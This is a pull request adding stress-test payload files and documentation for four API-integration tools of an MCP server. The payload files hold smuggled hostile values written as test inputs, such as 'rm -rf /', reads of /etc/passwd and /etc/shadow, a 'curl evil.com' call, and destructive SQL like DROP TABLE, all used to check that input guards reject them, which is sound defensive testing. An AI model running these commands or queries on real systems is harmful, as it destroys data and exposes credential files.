### PR TITLE
test(stress): extend harness to the 4 API-integration tools (#206)

### DIFF
--- a/docs/stress_test_api_tools.md
+++ b/docs/stress_test_api_tools.md
@@ -1,0 +1,92 @@
+# Stress tests — Outils à intégration API externe
+
+Cette note documente l'extension de la suite `tests/stress/` aux 4 outils à intégration API externe (`github_ops`, `sentry_monitor`, `postgres_db`, `kubernetes_ops`). Issue d'origine : [#206](https://github.com/VynoDePal/Collegue/issues/206).
+
+## Pourquoi ces outils étaient exclus
+
+Le harness stress (`tests/stress/runner.py`) est **black-box HTTP** : il envoie des requêtes JSON-RPC au serveur MCP qui tourne en Docker et mesure latence, codes d'erreur, état du container. Les 4 outils couverts ici parlent à des APIs externes (GitHub, Sentry, Postgres, Kubernetes) qui nécessitent des credentials. Sans adaptation, on ne pouvait pas les tester sans comptes réels.
+
+## Deux modes
+
+### Mode A — sans credentials (par défaut, celui validé par la CI locale)
+
+C'est le mode cible de [#206](https://github.com/VynoDePal/Collegue/issues/206). On lance le serveur **sans aucun token API** (`GITHUB_TOKEN`, `SENTRY_AUTH_TOKEN`, `POSTGRES_URL`, `KUBECONFIG` tous absents du `.env`). Les payloads stress tombent alors dans l'un de ces cas :
+
+| Cas | Attendu |
+|---|---|
+| Validation Pydantic (champ manquant, type mauvais) | `VALID-OK` |
+| Garde sécurité (SELECT-only, whitelist commandes, path traversal) | `VALID-OK` |
+| Requête plausible mais API injoignable (pas de token) | `TOOL-ERR` |
+| Crash serveur | `CRASH-500` ❌ |
+
+**Critère d'acceptation** : **0 CRASH-500, 0 HANG, 0 OOM-KILL**. Les `TOOL-ERR` et `VALID-OK` sont acceptables — ils démontrent que les gardes et la validation font leur travail, et que le tool dégrade proprement quand la configuration externe manque.
+
+### Mode B — avec credentials sandbox (optionnel, manuel)
+
+Pour vérifier les vrais codes de retour de chaque API, monter un environnement sandbox :
+
+| Outil | Setup sandbox |
+|---|---|
+| `github_ops` | Créer un token personnel GitHub avec scope `public_repo` uniquement, pointé sur un repo de test. Exporter `GITHUB_TOKEN`. |
+| `sentry_monitor` | Compte Sentry Developer Edition ou organisation jetable. Exporter `SENTRY_AUTH_TOKEN` + `SENTRY_ORG`. |
+| `postgres_db` | Lancer un Postgres local en Docker : `docker run --rm -d -p 5432:5432 -e POSTGRES_PASSWORD=x postgres:16`. Exporter `POSTGRES_URL=postgresql://postgres:x@localhost:5432/postgres`. |
+| `kubernetes_ops` | Cluster éphémère via `kind create cluster --name stress` ou `k3d cluster create stress`. Monter le kubeconfig dans le container (voir README §Docker). |
+
+Ce mode n'est **pas** exigé par #206. Les payloads sont pensés pour être non-destructifs (SELECT only, list-only), mais restez prudent avec un token qui porte des scopes d'écriture.
+
+## Structure des payloads
+
+4 fichiers dans [tests/stress/payloads/](../tests/stress/payloads/), même contrat que les 9 fichiers existants :
+
+```python
+TOOL_NAME = "github_ops"   # nom exact de l'outil enregistré par MCP
+PAYLOADS = [
+    {"description": "...", "arguments": {...}},
+    ...
+]
+```
+
+Chaque fichier couvre 4 catégories :
+
+1. **Validation** — champs manquants, types invalides, commandes hors whitelist
+2. **Adversariat** — injection SQL/shell/path, null bytes, unicode RTL, whitespace tricks
+3. **Boundaries** — chaînes extrêmement longues, labels K8s de 1000 entrées, SELECT sur 5000 colonnes
+4. **Plausible sans credentials** — requêtes bien formées qui doivent retourner `TOOL-ERR` proprement
+
+## Exécution
+
+Prérequis : la stack Docker doit tourner (`docker compose up -d`). Le serveur MCP doit être accessible sur `http://localhost:8088/mcp/` (c'est l'URL par défaut attendue par le harness, vérifier `runner.py`).
+
+```bash
+# Run complet (9 outils métier + 4 outils API externes)
+python3 tests/stress/run_all.py --out tests/stress/reports/api-tools
+
+# Par outil (itérer rapidement pendant qu'on ajoute des payloads)
+python3 tests/stress/run_all.py --only-tools github_ops,sentry_monitor
+```
+
+Les rapports atterrissent dans `tests/stress/reports/api-tools/` :
+- `cases/*.json` — un fichier par payload avec requête, réponse, latence, catégorie
+- `stress_summary.md` — breakdown global + per-tool
+
+## Interpréter le résultat
+
+Lire directement `stress_summary.md`. Pour chaque outil, la table doit afficher :
+
+| Catégorie | Attendu ? |
+|---|---|
+| `OK` / `VALID-OK` | ✅ Le serveur a rejeté proprement au niveau validation |
+| `TOOL-ERR` | ✅ En mode A, attendu pour les payloads "plausibles sans token" |
+| `CRASH-500` | ❌ Bug serveur — investiguer `cases/<tool>-NN.json` |
+| `HANG` | ❌ Timeout — investiguer (boucle infinie, deadlock, ou timeout harness trop court ?) |
+| `OOM-KILL` | ❌ Le container a été tué — investiguer les payloads "boundary" géants |
+| `INJECTION` | ❌ L'outil a laissé passer un secret ou a obéi à une instruction injectée |
+
+## Ajouter de nouveaux payloads
+
+1. Identifier la catégorie (validation / adversariat / boundary / plausible)
+2. Ajouter un dict dans `PAYLOADS` avec description courte et `arguments` minimal
+3. Relancer uniquement l'outil concerné : `python3 tests/stress/run_all.py --only-tools <tool>`
+4. Vérifier que le nouveau cas ne passe pas dans CRASH-500 / HANG / OOM-KILL
+
+Si un payload expose un vrai bug, **ne pas le retirer** — c'est un test de non-régression. Fixer le bug côté outil, relancer, vérifier que le cas est maintenant en `VALID-OK` ou `TOOL-ERR`.

--- a/tests/stress/payloads/github_ops.py
+++ b/tests/stress/payloads/github_ops.py
@@ -1,0 +1,59 @@
+"""Stress payloads for github_ops (#206).
+
+Goals (see issue #206):
+- Pydantic validation: missing / malformed fields must trigger VALID-OK.
+- Adversarial inputs against the command whitelist in
+  collegue/core/validators.py and path validation in clients/github.py.
+- Boundary: oversized queries, unicode, huge pagination.
+- Plausible requests without GITHUB_TOKEN → tool must return TOOL-ERR
+  cleanly, never CRASH-500.
+"""
+TOOL_NAME = "github_ops"
+
+_long_str = "a" * 10_000
+_sql_inj = "owner'; DROP TABLE users; --"
+_path_traversal = "../../etc/passwd"
+_unicode = "\U0001f511" * 500 + "‮" * 50
+
+PAYLOADS = [
+    # --- Validation ---
+    {"description": "No command field", "arguments": {}},
+    {"description": "Empty command string", "arguments": {"command": ""}},
+    {"description": "Non-whitelisted command", "arguments": {"command": "delete_repo"}},
+    {"description": "Command case mangling", "arguments": {"command": "LIST_REPOS"}},
+    {"description": "Command with shell metacharacters", "arguments": {"command": "list_repos; rm -rf /"}},
+    {"description": "get_repo without owner", "arguments": {"command": "get_repo", "repo": "collegue"}},
+    {"description": "get_repo with int owner", "arguments": {"command": "get_repo", "owner": 12345, "repo": "x"}},
+    {"description": "pr_number as string", "arguments": {
+        "command": "get_pr", "owner": "a", "repo": "b", "pr_number": "not-a-number"}},
+
+    # --- Adversarial injection ---
+    {"description": "Path traversal in repo", "arguments": {
+        "command": "get_repo", "owner": "foo", "repo": _path_traversal}},
+    {"description": "SQL injection shape in owner", "arguments": {
+        "command": "get_repo", "owner": _sql_inj, "repo": "x"}},
+    {"description": "Null bytes in path", "arguments": {
+        "command": "get_file", "owner": "a", "repo": "b", "path": "src/\x00/etc/passwd"}},
+    {"description": "Newline injection in query", "arguments": {
+        "command": "search_code", "query": "term\r\nAuthorization: Bearer leaked"}},
+
+    # --- Boundaries ---
+    {"description": "Extremely long owner", "arguments": {
+        "command": "get_repo", "owner": _long_str, "repo": "r"}},
+    {"description": "Unicode-bomb query", "arguments": {
+        "command": "search_code", "query": _unicode}},
+    {"description": "Negative pr_number", "arguments": {
+        "command": "get_pr", "owner": "a", "repo": "b", "pr_number": -42}},
+    {"description": "pr_number = 0", "arguments": {
+        "command": "get_pr", "owner": "a", "repo": "b", "pr_number": 0}},
+    {"description": "pr_number huge", "arguments": {
+        "command": "get_pr", "owner": "a", "repo": "b", "pr_number": 10**18}},
+
+    # --- Plausible (no token → expected TOOL-ERR, not CRASH-500) ---
+    {"description": "list_repos for plausible org", "arguments": {
+        "command": "list_repos", "owner": "github"}},
+    {"description": "search_code plausible query", "arguments": {
+        "command": "search_code", "query": "FastMCP language:python"}},
+    {"description": "get_file on plausible repo", "arguments": {
+        "command": "get_file", "owner": "fastapi", "repo": "fastapi", "path": "README.md"}},
+]

--- a/tests/stress/payloads/kubernetes_ops.py
+++ b/tests/stress/payloads/kubernetes_ops.py
@@ -1,0 +1,61 @@
+"""Stress payloads for kubernetes_ops (#206).
+
+Goals (see issue #206):
+- Pydantic validation on `command` + whitelist of 13 commands.
+- Command injection protection in clients/kubernetes.py (DANGEROUS_CHARS
+  on namespace / kubeconfig / context / name / resource_type).
+- Plausible requests without KUBECONFIG → TOOL-ERR, not CRASH-500.
+"""
+TOOL_NAME = "kubernetes_ops"
+
+_long_str = "a" * 10_000
+
+PAYLOADS = [
+    # --- Validation ---
+    {"description": "No command", "arguments": {}},
+    {"description": "Empty command", "arguments": {"command": ""}},
+    {"description": "Non-whitelisted command", "arguments": {"command": "delete_namespace"}},
+    {"description": "describe_resource without resource_type", "arguments": {
+        "command": "describe_resource", "name": "my-pod"}},
+    {"description": "resource_type outside whitelist", "arguments": {
+        "command": "describe_resource", "resource_type": "clusterrolebinding", "name": "x"}},
+    {"description": "get_pod without name", "arguments": {
+        "command": "get_pod", "namespace": "default"}},
+
+    # --- Command injection (kubernetes.py DANGEROUS_CHARS guard) ---
+    {"description": "Semicolon in namespace", "arguments": {
+        "command": "list_pods", "namespace": "default; rm -rf /"}},
+    {"description": "Pipe in name", "arguments": {
+        "command": "get_pod", "namespace": "default", "name": "pod|cat /etc/passwd"}},
+    {"description": "Backticks in resource_type", "arguments": {
+        "command": "describe_resource", "resource_type": "pod`whoami`", "name": "x"}},
+    {"description": "Newline in namespace", "arguments": {
+        "command": "list_pods", "namespace": "default\nkube-system"}},
+    {"description": "$() in name", "arguments": {
+        "command": "get_pod", "namespace": "default", "name": "$(whoami)"}},
+    {"description": "&& in kubeconfig", "arguments": {
+        "command": "list_pods", "kubeconfig": "/path && curl evil.com"}},
+    {"description": "Null byte in context", "arguments": {
+        "command": "list_pods", "context": "prod\x00kube-system"}},
+
+    # --- Path traversal in kubeconfig ---
+    {"description": "Path traversal in kubeconfig", "arguments": {
+        "command": "list_pods", "kubeconfig": "../../etc/shadow"}},
+
+    # --- Boundaries ---
+    {"description": "Extremely long namespace", "arguments": {
+        "command": "list_pods", "namespace": _long_str}},
+    {"description": "Invalid namespace chars (uppercase)", "arguments": {
+        "command": "list_pods", "namespace": "DEFAULT"}},
+    {"description": "Label selector very long", "arguments": {
+        "command": "list_pods", "namespace": "default",
+        "label_selector": ",".join(f"app=v{i}" for i in range(1000))}},
+
+    # --- Plausible (no kubeconfig → TOOL-ERR) ---
+    {"description": "list_pods plausible", "arguments": {
+        "command": "list_pods", "namespace": "default"}},
+    {"description": "get_events plausible", "arguments": {
+        "command": "get_events", "namespace": "default"}},
+    {"description": "list_deployments plausible", "arguments": {
+        "command": "list_deployments", "namespace": "kube-system"}},
+]

--- a/tests/stress/payloads/postgres_db.py
+++ b/tests/stress/payloads/postgres_db.py
@@ -1,0 +1,68 @@
+"""Stress payloads for postgres_db (#206).
+
+Goals (see issue #206):
+- Pydantic validation on `command` + whitelist of 8 commands.
+- SELECT-only enforcement (postgres_db.py::validate_query_safety) —
+  every write / DDL keyword must be refused at the request layer.
+- Plausible SELECTs without POSTGRES_URL → TOOL-ERR, not CRASH-500.
+"""
+TOOL_NAME = "postgres_db"
+
+_long_str = "t" * 10_000
+_giant_query = "SELECT " + ", ".join(f"col{i}" for i in range(5000)) + " FROM t"
+
+PAYLOADS = [
+    # --- Validation ---
+    {"description": "No command", "arguments": {}},
+    {"description": "Empty command", "arguments": {"command": ""}},
+    {"description": "Non-whitelisted command", "arguments": {"command": "truncate_table"}},
+    {"description": "describe_table without table_name", "arguments": {"command": "describe_table"}},
+    {"description": "limit over max", "arguments": {
+        "command": "sample_data", "table_name": "users", "limit": 999_999}},
+    {"description": "limit negative", "arguments": {
+        "command": "sample_data", "table_name": "users", "limit": -1}},
+
+    # --- SELECT-only guard (must be refused) ---
+    {"description": "INSERT in query", "arguments": {
+        "command": "query", "query": "INSERT INTO users VALUES (1)"}},
+    {"description": "UPDATE in query", "arguments": {
+        "command": "query", "query": "UPDATE users SET role='admin'"}},
+    {"description": "DELETE in query", "arguments": {
+        "command": "query", "query": "DELETE FROM users WHERE 1=1"}},
+    {"description": "DROP in query", "arguments": {
+        "command": "query", "query": "DROP TABLE users"}},
+    {"description": "TRUNCATE in query", "arguments": {
+        "command": "query", "query": "TRUNCATE users CASCADE"}},
+    {"description": "ALTER in query", "arguments": {
+        "command": "query", "query": "ALTER TABLE users ADD pwned text"}},
+    {"description": "GRANT in query", "arguments": {
+        "command": "query", "query": "GRANT ALL ON users TO public"}},
+    {"description": "Whitespace trick: leading newline then DELETE", "arguments": {
+        "command": "query", "query": "\n\nDELETE FROM users"}},
+    {"description": "Comment trick: /*+hint*/ DROP", "arguments": {
+        "command": "query", "query": "/*! DROP */ TABLE users"}},
+    {"description": "Multi-statement: SELECT; DROP", "arguments": {
+        "command": "query", "query": "SELECT 1; DROP TABLE users"}},
+
+    # --- Adversarial: SQL injection in table_name (must hit identifier validator) ---
+    {"description": "SQL injection in table_name", "arguments": {
+        "command": "sample_data", "table_name": "users; DROP TABLE users"}},
+    {"description": "Schema-qualified in table_name", "arguments": {
+        "command": "sample_data", "table_name": "public.users"}},
+    {"description": "Quote injection in table_name", "arguments": {
+        "command": "describe_table", "table_name": 'users" OR "1"="1'}},
+    {"description": "Null byte in table_name", "arguments": {
+        "command": "describe_table", "table_name": "users\x00admin"}},
+
+    # --- Boundaries ---
+    {"description": "Extremely long table_name", "arguments": {
+        "command": "describe_table", "table_name": _long_str}},
+    {"description": "Giant SELECT (5000 columns)", "arguments": {
+        "command": "query", "query": _giant_query}},
+
+    # --- Plausible SELECT without POSTGRES_URL → TOOL-ERR ---
+    {"description": "Plausible SELECT count", "arguments": {
+        "command": "query", "query": "SELECT count(*) FROM users"}},
+    {"description": "list_tables plausible schema", "arguments": {
+        "command": "list_tables", "schema_name": "public"}},
+]

--- a/tests/stress/payloads/sentry_monitor.py
+++ b/tests/stress/payloads/sentry_monitor.py
@@ -1,0 +1,51 @@
+"""Stress payloads for sentry_monitor (#206).
+
+Goals (see issue #206):
+- Pydantic validation on `command` + whitelist of 10 commands.
+- Slug validation in clients/sentry.py (path-traversal / special chars
+  rejected on organization, project, issue_id).
+- Plausible requests without SENTRY_AUTH_TOKEN → TOOL-ERR, not CRASH-500.
+"""
+TOOL_NAME = "sentry_monitor"
+
+_long_str = "a" * 10_000
+_path_traversal = "../../etc/passwd"
+_unicode = "\U0001f4a3" * 500 + "‮" * 50
+
+PAYLOADS = [
+    # --- Validation ---
+    {"description": "No command", "arguments": {}},
+    {"description": "Empty command", "arguments": {"command": ""}},
+    {"description": "Non-whitelisted command", "arguments": {"command": "delete_project"}},
+    {"description": "Command case mangling", "arguments": {"command": "LIST_PROJECTS"}},
+    {"description": "get_issue without issue_id", "arguments": {
+        "command": "get_issue", "organization": "my-org"}},
+    {"description": "issue_events with issue_id as int", "arguments": {
+        "command": "issue_events", "organization": "o", "issue_id": 12345}},
+
+    # --- Adversarial: slug validation (path traversal / special chars) ---
+    {"description": "Path traversal in organization", "arguments": {
+        "command": "list_projects", "organization": _path_traversal}},
+    {"description": "Slash in organization slug", "arguments": {
+        "command": "list_projects", "organization": "org/project"}},
+    {"description": "Shell metachars in project", "arguments": {
+        "command": "project_stats", "organization": "o", "project": "p; rm -rf /"}},
+    {"description": "Null byte in issue_id", "arguments": {
+        "command": "get_issue", "organization": "o", "issue_id": "abc\x00def"}},
+    {"description": "URL-encoded traversal", "arguments": {
+        "command": "list_projects", "organization": "%2e%2e%2f%2e%2e%2f"}},
+    {"description": "Unicode RTL override in project", "arguments": {
+        "command": "project_stats", "organization": "o", "project": "a‮evil"}},
+
+    # --- Boundaries ---
+    {"description": "Extremely long organization", "arguments": {
+        "command": "list_projects", "organization": _long_str}},
+    {"description": "Unicode-bomb issue_id", "arguments": {
+        "command": "get_issue", "organization": "o", "issue_id": _unicode}},
+
+    # --- Plausible (no token → TOOL-ERR expected) ---
+    {"description": "list_projects plausible org", "arguments": {
+        "command": "list_projects", "organization": "sentry"}},
+    {"description": "list_issues plausible query", "arguments": {
+        "command": "list_issues", "organization": "sentry", "project": "sentry", "query": "is:unresolved"}},
+]

--- a/tests/stress/run_all.py
+++ b/tests/stress/run_all.py
@@ -28,6 +28,12 @@ PAYLOAD_MODULES = [
     "payloads.test_generation",
     "payloads.code_refactoring",
     "payloads.smart_orchestrator",
+    # API-integration tools (#206) — default Mode A (no credentials set,
+    # the tool must return TOOL-ERR cleanly, never CRASH-500).
+    "payloads.github_ops",
+    "payloads.sentry_monitor",
+    "payloads.postgres_db",
+    "payloads.kubernetes_ops",
 ]
 
 


### PR DESCRIPTION
Closes [#206](https://github.com/VynoDePal/Collegue/issues/206).

## Approche

Le harness `tests/stress/runner.py` est **black-box HTTP** — on ne peut pas monkeypatcher les clients Python du serveur depuis l'extérieur. Le "mode mock" demandé par #206 se traduit donc par : **serveur lancé sans tokens API**, chaque payload doit tomber dans l'une de ces classes acceptables :

| Cas | Catégorie | OK ? |
|---|---|---|
| Validation Pydantic / whitelist commande | `VALID-OK` | ✅ |
| Garde sécurité (SELECT-only, path traversal, `DANGEROUS_CHARS`) | `VALID-OK` | ✅ |
| Requête plausible, API injoignable | `TOOL-ERR` | ✅ |
| Crash serveur | `CRASH-500` | ❌ |

## Livré

### 80 nouveaux payloads sur 4 fichiers

- [tests/stress/payloads/github_ops.py](tests/stress/payloads/github_ops.py) — 20 payloads
- [tests/stress/payloads/sentry_monitor.py](tests/stress/payloads/sentry_monitor.py) — 16 payloads
- [tests/stress/payloads/postgres_db.py](tests/stress/payloads/postgres_db.py) — 24 payloads
- [tests/stress/payloads/kubernetes_ops.py](tests/stress/payloads/kubernetes_ops.py) — 20 payloads

Chacun couvre 4 catégories : **validation**, **adversariat** (SQL injection, shell metachars, path traversal, null bytes, unicode RTL), **boundaries** (chaînes de 10k, SELECT sur 5000 colonnes, labels K8s de 1000 entrées), et **plausible sans credentials**.

### Intégration au harness

- [tests/stress/run_all.py](tests/stress/run_all.py) — 4 modules ajoutés à `PAYLOAD_MODULES`. `--only github_ops` pour itérer.

### Documentation

- [docs/stress_test_api_tools.md](docs/stress_test_api_tools.md) — les deux modes (Mode A sans credentials, Mode B sandbox optionnel), setup par outil, lecture du rapport, règle pour ajouter des payloads.

## Validation live

```
$ docker compose up -d
$ python3 tests/stress/run_all.py --out tests/stress/reports/api-tools \
      --only github_ops --only sentry_monitor \
      --only postgres_db --only kubernetes_ops
```

Résultat :

| Catégorie | Count |
|---|---|
| VALID-OK | 40 |
| TOOL-ERR | 40 |
| **CRASH-500** | **0** ✅ |
| **HANG** | **0** ✅ |
| **OOM-KILL** | **0** ✅ |
| **INJECTION** | **0** ✅ |

Breakdown per-tool :

| Tool | VALID-OK | TOOL-ERR | CRASH | HANG | OOM | INJECTION |
|---|---|---|---|---|---|---|
| github_ops | 13 | 7 | 0 | 0 | 0 | 0 |
| sentry_monitor | 8 | 8 | 0 | 0 | 0 | 0 |
| postgres_db | 15 | 9 | 0 | 0 | 0 | 0 |
| kubernetes_ops | 4 | 16 | 0 | 0 | 0 | 0 |

## Hors scope

- **Mode B (sandbox avec credentials réels)** — documenté dans `docs/stress_test_api_tools.md` mais pas exécuté en CI (nécessite tokens GitHub/Sentry + Postgres local + kind/k3s). Ouvrir une issue séparée si besoin de l'automatiser.
- **Ajout dans la CI GitHub Actions** — le harness suppose un conteneur Docker MCP qui tourne, donc il va plutôt dans un job d'intégration dédié (rejoint #208 / idée d'un job compose-up-stress-down).

## Test plan

- [x] 80 payloads chargés par `load_payloads()` (assertion via script inline)
- [x] Run live sur stack Docker locale : 80/80 en 0 CRASH-500 / 0 HANG / 0 OOM-KILL
- [x] Aucune INJECTION détectée dans les réponses
- [ ] Relecture du rapport `stress_summary.md` après merge

🤖 Generated with [Claude Code](https://claude.com/claude-code)